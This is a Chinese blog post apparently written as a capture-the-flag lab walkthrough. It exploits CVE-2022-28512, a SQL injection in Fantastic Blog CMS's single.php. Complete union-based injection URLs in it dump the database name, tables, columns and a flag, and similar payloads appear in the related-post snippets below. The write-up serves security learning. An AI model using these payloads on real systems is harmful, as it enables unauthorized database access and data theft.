春秋云境-28512 sql手工注入

最新推荐文章于 2024-05-09 13:50:48 发布
最新推荐文章于 2024-05-09 13:50:48 发布
阅读量602 收藏 20
点赞数 23
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_75161850/article/details/138160858
版权

目录

首先寻找注入点

爆数据库

爆表名

爆列名

爆数据得到flag

题目告诉我们,漏洞是在single.php路径下面。

于是我们首先就需要找到single.php路径。

首先寻找注入点


在url里输入single.php,就发现了这个网页。

下一步,就在url里手工sql注入,随便输入一些’ “)(符号,发现有没有sql注入漏洞。

输入

http://eci-2ze7odmph63e3dwuzrpb.cloudeci1.ichunqiu.com//single.php?id=1'  发现出现了报错。这个时候,就很开心,看来找对地方了。

分析报错发现  ' '1'' '多了一个引号,所以这个闭合为’。

接下来我们就可以构造SQL语句了。

输入

http://eci-2ze7odmph63e3dwuzrpb.cloudeci1.ichunqiu.com/single.php?id=-1' union select  1,2,3,4,5,6,7,8,9 --+

发现2,4可能有回显。

接下来试试

http://eci-2ze7odmph63e3dwuzrpb.cloudeci1.ichunqiu.com/single.php?id=-1' union select  1,database(),3,database(),5,6,7,8,9 --+

发现果然2和4有回显,并且数据库名为ctf。

注意:2和4回显的位置都可以爆出数据。

爆数据库

http://eci-2zegk6aa9xtn2h5dmgs6.cloudeci1.ichunqiu.com/single.php?id=-1' union select 1,database(),3,4,5,6,7,8,9 --+

得到数据库名为ctf。

爆表名

http://eci-2ze7odmph63e3dwuzrpb.cloudeci1.ichunqiu.com//single.php?id=-1' union select 1,group_concat(table_name),3,4,5,6,7,8,9 from information_schema.tables where table_schema=database() --+

 所有的表名titles,page_hits,membership_userpermissions,membership_groups,blog_categories,membership_userrecords,membership_users,editors_choice,blogs,links,flag,banner_posts,membership_grouppermissions,visitor_info

得到了所有的表名,关键表名为flag。

爆列名

http://eci-2zegk6aa9xtn2h5dmgs6.cloudeci1.ichunqiu.com/single.php?id=-1' union select  1,group_concat(column_name),3,4,5,6,7,8,9 from information_schema.columns where table_name='flag' --+

发现列名也是flag。

知道了列名之后,我们就可以爆数据得到flag了

http://eci-2zegk6aa9xtn2h5dmgs6.cloudeci1.ichunqiu.com/single.php?id=-1' union select  1,flag,3,4,5,6,7,8,9 from flag --+

flag为:

flag{6227fa8d-491b-4160-b4ee-e701e0f3cab1}

∝旧梦う
关注
Fantastic Blog CMS SQL注入漏洞(CVE-2022-28512)
千寻的博客
11-28 1293
Fantastic Blog (CMS)是一个绝对出色的博客/文章网络内容管理系统。它使您可以轻松地管理您的网站或博客,它为您提供了广泛的功能来定制您的博客以满足您的需求。 - 它具有强大的功能,您无需接触任何代码即可启动并运行您的博客。 - 该CMS的`/single.php`路径下,`id`参数存在一个`SQL注入`漏洞。
墨者--SQL手工注入漏洞测试(MySQL数据库)
YYYYYcici的博客
05-18 1485
墨者–SQL手工注入漏洞测试(MySQL数据库) 解题思路: 判断注入 利用order by 判断字段数量 联合注入 1、判断注入 2、order by判断 3、联合注入 查库名 and 1=2 union select 1,table_name,3,4 from information_schema.tables where table_schema=”库名” and 1=2 un...
春秋云境靶场CVE-2022-28512漏洞复现(sql手工注入)
zyh1588的博客
11-19 1501
小白复现CVE-2022-28512漏洞
春秋云境靶场CVE-2022-32991漏洞复现(sql手工注入)
zyh1588的博客
11-14 1309
小白复现CVE-2022-32991漏洞,该CMS的welcome.php中存在SQL注入攻击......
SQL注入基础实战(i春秋
Jaychouzzk
08-17 3465
1.Access手工注入  实验环境 操作机:Windows XP 目标机:Windows Server 2003 目标地址:http://172.16.12.2 实验工具 火狐浏览器:火狐浏览器是一款非常流行的Internet浏览器。 实验目的 1、学习Asp手工注入方法 2、学习Asp手工注入原理 实验内容 Access Access是Microsoft Office Acc...
i春秋SQL注入-1
金 帛的博客
04-04 724
i春秋WP
春秋云境:CVE-2022-32991(SQL注入
m0_65712192的博客
04-12 1762
该CMS的welcome.php中存在SQL注入攻击。
i春秋CTF-训练营 SQL注入-2 一鱼三吃 sqlmap bp手注 python脚本
AAAAAAAAAAAA66的博客
11-30 495
目录 题目 做题前获取的信息 一鱼三吃 sqlmap burp手注 python自动化脚本 题目 做题前获取的信息 F12查看源码得到提示 依照题目信息,post提交数据。 一鱼三吃 sqlmap 随便输入用户名,密码 提交 burp拦截 右键 Copy to file 文件保存为2.txt 我用的burp是在windows环境下的,所以把2.txt 复制放在kail桌面。(也可以自己在虚拟机创建一个2.txt文件 ,把bp中的数据粘贴到文件中...
i春秋SQL(详细WP)
金 帛的博客
02-22 1535
i春秋webWP
春秋云境 CVE-2022-4230 夺旗
05-02
### 春秋云境 CVE-2022-4230 夺旗知识点解析 #### 一、漏洞概述 **CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件(版本13.2.9及以前)中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时...
墨者靶场-SQL手工注入漏洞测试(MySQL数据库-字符型)
weixin_46694260的博客
03-27 3955
0x00 前言 我们都知道,SQL注入分数字型和字符型,我们上次讲的是最基本的数字型SQL注入,这次我们就来讲最基本的字符型SQL注入。同样,如果是明白原理和方法的话,看懂这篇文章并不难,但是如果不清楚原理和方法的话…还是可以看的,大家多多给我点赞吧,哈哈哈哈哈,还是那句话,菜鸟一个,大佬勿喷~ 0x01 过程 首先,还是老样子,我们先看一下题目 这里通过题目我们知道,这次SQL注入是字符型的SQL注入 那我们就进入靶场环境 可以看到和上次一样,有一个登录系统,登录框下面有一个维护新闻轮播框 我们点进去
墨者学院-SQL手工注入漏洞测试(MySQL数据库)
weixin_42939822的博客
03-16 3604
墨者学院-SQL手工注入漏洞测试(MySQL数据库)
春秋云境CVE-2022-28512
m0_64432806的博客
03-18 1233
CVE-2022-28512 Fantastic Blog (CMS)是一个绝对出色的博客/文章网络内容管理系统。它使您可以轻松地管理您的网站或博客,它为您提供了广泛的功能来定制您的博客以满足您的需求。它具有强大的功能,您无需接触任何代码即可启动并运行您的博客。 该CMS的/single.php路径下,id参数存在一个SQL注入漏洞。
春秋云境CVE-2023-7130
最新发布
2303_76653367的博客
05-09 550
College Notes Gallery 2.0 允许通过“/notes/login.php”中的参数‘user’进行 SQL 注入。利用这个问题可能会使攻击者有机会破坏应用程序,访问或修改数据.
春秋云镜 - CVE-2022-32991
09-21 45
bp抓包,后台挂上sqlipy然后去测welcome.php,常用的语句都没成功但过一会就有了结果,注入点在eid这个参数,看payload是bool盲注。该CMS的welcome.php中存在SQL注入攻击。访问页面,先注册,使用邮箱加密码登录。直接sqlmap一把梭,脱裤。
春秋云镜CVE-2022-32991 Web Based Quiz System SQL注入
Ambition_sec的博客
11-16 648
春秋云镜CVE-2022-32991 Web Based Quiz System SQL注入
i 春秋 CTF训练营 web——SQL注入 1(字符型注入)(手动注入
AAAAAAAAAAAA66的博客
11-30 2575
这道题可以直接使用sqlmap 直接跑出。 下文介绍的是手注: 本文用到了搜狐插件hackbar,(使用效果与直接在url栏输入参数相同) 题目(得知是注入题) 判断是否为数字型 http://eci-2ze7889omx49vxiu5ma0.cloudeci1.ichunqiu.com/index.php?id=1 and 1=1 http://eci-2ze7889omx49vxiu5ma0.cloudeci1.ichunqiu.com/index.php?id=1 and 1.
i春秋web-SQL(基础绕过注入)
Sea_Sand息禅
05-21 772
很简单的一道注入,没有任何闭合,直接就是个整数的注入 id=1 order by 1 报错:inj code! 对order进行处理 1)id=1 or<>der by 1 报错:inj code! 2)id=1 ord<>er by 1 页面正常 id=-1 union sel<>ect 1,2,3 页面显示2,说明作用...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值